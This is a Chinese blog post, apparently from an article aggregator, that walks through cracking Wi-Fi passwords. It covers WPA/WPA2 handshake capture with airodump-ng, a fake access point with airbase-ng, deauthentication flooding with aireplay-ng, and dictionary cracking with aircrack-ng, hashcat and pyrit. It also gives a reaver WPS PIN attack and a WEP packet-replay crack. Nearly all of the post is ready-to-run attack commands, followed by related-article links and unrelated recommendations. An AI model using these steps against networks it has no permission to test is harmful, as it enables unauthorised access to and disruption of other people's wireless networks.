话不多说,先来看看字典破解 wpa2 的效果

===================================

===============================================
字典破解 wifi-wpa/wpa2
目前最常用的加密类型
此方法只适合破解弱口令
其他暴力破解伤CPU/GPU
===============================================
1. 安装aircrack-ng
   1. 直接使用apt-get,但有的软件仓库不是最新版
   2. 源码安装 http://www.aircrack-ng.org/
      * 现在要翻一下才能下载

2. 无线网卡开启monitor(建议另外使用usb无线网卡)
  > sudo ifconfig wlan0 down
  > sudo iwconfig wlan0 mode monitor

3. 查看无线网络,选择对象BSSID和CHN(通道),同时记下ESSID
  > sudo airodump-ng wlan0

4. 对指定对象进行dump, 并记录连接该BSSID的STATION(CLIENTID, 也就是谁连了)
  > sudo airodump-ng -w wpa2 -c CHN --bssid BSSID wlan0
  * -w 为保存的抓包文件的前缀
  * -c 为前面记录的通道

5. 创建fake AP(可以加快获取握手报文)
  > sudo airbase-ng -a BSSID --essid ESSID -c CH -Z 4 -W 1 wlan0
    * 如果是wpa  一般是  -z 2  z小写(TKIP)
    * 如果是wpa2 一般是  -Z 4  Z大写(CCMP)

6. 向该网络内广播解除认证报文
  > sudo aireplay-ng -0 0 -a BSSID -c CLIENTID --ignore-negative-one wlan0

7. 等待handshake
  > 步骤4中右上脚显示收到handshake报文
  > 使用aircrack-ng *.cap 探测是否包含handshake
  > 当包含handshake报文时停止4,5,6

以下使用三种软件破解:
aircrack-ng
------
1. 开始破解
   > aircrack-ng *.cap -w dict
   * dict为字典文件,每一行一个密码

hashcat
-------
1. 将dump文件wpa2-01.cap转换为待破解格式文件done.hccap
   > wpaclean out.cap wpa2-01.cap
   > aircrack-ng out.cap -J done

2. 开始破解
   > hashcat -m 2500 done.hccap dict

pyrit
-------
1. 开始破解
   > pyrit -r wpa2-01.cap -i dict attack_passthrough

===========================================
通过PIN破解wifi
此方法需要wifi开启wps功能,且信号尽量好
目前大部分厂家的无线路由器默认是关闭wps的
同时也具有防PIN的功能
所以现在此方法用得不多了
===========================================

1. 网卡配置参考wpa/wpa2破解

2. 查看开启WPS的无线网络,选择对象BSSID
  > sudo airodump-ng --wps wlan0

3. 开始破解
  > sudo reaver -i wlan0 -b BSSID -vv
  * 根据实际环境可以改变pin的间隔时间

4. 漫长的等待

============================================
WEP加密方式破解
如果有WEP加密的wifi基本都可以很快破解
但是很不幸,这种加密方式已很难见到
但是还是学习下
============================================
1. 网卡配置参考wpa/wpa2破解

2. 查看无线无线网络,找到加密方式为WEP的wifi, 记录对象BSSID
  > sudo airodump-ng wlan0

3. 对指定对象进行dump
  > sudo airodump-ng -w wep -c 10 --bssid BSSID wlan0

4. 向对象发送请求以获取更多的报文
  > sudo aireplay-ng -1 0 -a BSSID wlan0
  * 此步骤可选择攻击方式很多,可以自行man一下

5. 读取网络中的报文(读取上万后即可停止)
  > sudo aireplay-ng -3 -b BSSID wlan0

6. 进行破解,利用当前目录下的.cap文件
  > aircrack-ng wep-01.cap

7. 如果第6步破解失败,则重复5-6

[WIFI] WIFI 破解(初级)的更多相关文章

  1. WiFi密码破解CDlinux

    好了,先说下提前要准备的东东吧:1.U盘一枚,最小1G空间.需进行格式化操作,提前保存内部文件.2.CDlinux镜像.帖子最后会提供一枚8月最新修改版,共135M. 1.CDlinux U盘启动  ...

  2. 【WiFi密码破解详细图文教程】ZOL仅此一份 详细介绍从CDlinux U盘启动到设置扫描破解-破解软件论坛-ZOL中关村在线

    body { font-family: Microsoft YaHei UI,"Microsoft YaHei", Georgia,Helvetica,Arial,sans-ser ...

  3. WiFi密码破解详细图文教程

    每天都能看到有不少网友在回复论坛之前发布的一篇破解WiFi密码的帖子,并伴随各种疑问.今天流云就为大家准备一篇实战型的文章吧,详细图文从思维CDlinux U盘启动到中文设置,如何进行路由SSID扫描 ...

  4. Wifi密码破解

    Wifi密码破解1:通过字典(暴力)破解WIFI密码   简单破解WEP/WPA/WPA2加密的WIFI密码,平台kali-linux 工具:Aircrack-ng 过程很简单:先抓含有正确密码的握手 ...

  5. aircrack-ng wifi密码破解

    wifi密码破解 步骤1:查看网卡信息 ifconfig 找到你要用到的网卡 步骤2:启动网卡监听模式 airmon-ng start wlan0 我的是wlp2s0 步骤三:查看网卡变化 wlan0 ...

  6. Kali对wifi的破解记录

    好记性不如烂笔头,记录一下. 我是在淘宝买的拓实N87,Kali可以识别,还行. 操作系统:Kali 开始吧. 查看一下网卡的接口.命令如下 airmon-ng 可以看出接口名称是wlan0mon. ...

  7. 15款免费WiFi入侵破解安全测试工具

    以下是的15款免费(接近免费)的WiFi网络入侵测试工具.这些工具将帮你发现流氓AP,弱Wi-Fi密码等安全隐患,在黑客光临之前把漏洞补上. 一.Vistumbler扫描器 Kismet是一个开源的W ...

  8. CDLinux环境下WiFi密码破解

    > 准备好所需软件以及上篇教程中使用Fbinstool制作的可启动U盘 2 > 解压CDLinux-0.9-spring-0412.iso到U盘的根目录  如图 3 > 打开fbin ...

  9. wifi密码破解方法总结(含破解软件下载链接)

    眼下网上流行有非常多无线password的破解方法,总结起来最有用的还是这两种:第一种是Wirelessnetview+WinAirCrackPack软件组合,这个方法简单方便:另外一种就是大家熟悉的 ...

随机推荐

  1. Aria2 Axel wget curl 四个下载命令

    经常由于不同需求使用下载管理器从互联网下载文件,它给我和其他人提供了很多帮助.我们都想要一个超级快速的下载管理器来完成下载尽可能多的任务,以便我们可以节省时间来进一步地工作.有很多可以加速下载的下载管 ...

  2. C#捕获鼠标消息

    在C#中怎样禁用鼠标按键,我们可以通过ImessageFilter接口下的PreFilterMessage方法.Application类的AddMessageFilter方法,RemoveMessag ...

  3. node-webkit连接mysql

    一.安装node.js mysql驱动库 node-webkit里面没有mysql模块的,我们需要安装mysql模块.我们可以使用npm(Node package manager)进行安装.这里使用到 ...

  4. 用CSS3实现文字描边效果【效果在这儿,创意在你!】

    CSS3作为新兴的前端技术可以实现很多复杂变化的效果,比如文字描边. 这里主要用到text-shadow属性,顾名思义就是为文字加上阴影效果.例: text-shadow:10px 5px 2px # ...

  5. Spring bean的初始化及销毁

    Spring bean的几个属性:scope.init-method.destroy-method.depends-on等. Scope 在Spring容器中是指其创建的Bean对象相对于其他Bean ...

  6. Climbing Stairs爬楼梯——动态规划

    题目描写叙述: 初阶:有n层的台阶,一開始你站在第0层,每次能够爬两层或者一层. 请问爬到第n层有多少种不同的方法? 进阶:假设每次能够爬两层.和倒退一层,同一个位置不能反复走,请问爬到第n层有多少种 ...

  7. 扫盲:java中关于路径的问题

    ../FileName:当前工程的上级目录. ./FileName:当前工程所在的目录. /FileName:当前工程所在磁盘的根目录(windows下). FileName:当前工程所在的目录.

  8. unity3d中的DontDestroyOnLoad来回切换出现多个实例问题

    在用Unity3D开发游戏中,我们会经常创建多个场景,但是在场景过度的时候,通常场景中的对象会被删除.所以Unity3D给了我们一个不删除前一个 场景中的某一个对象或者脚本的API,那就是“DontD ...

  9. Powershell 的自己主动部署

     工作中反复性的版本号移植,一天上线10几次,让我痛不欲生,频繁的操作也可能出现疲劳性失误,导致严重的生产故障.于是乎,闲暇时间.我開始研究使用powershell自己主动部署程序到Linuxse ...

  10. GOlang eclipse install

    http://golang.org/dl/ 下载golang https://codeload.github.com/GoClipse/goclipse/tar.gz/v0.8.1 解压 安装ecli ...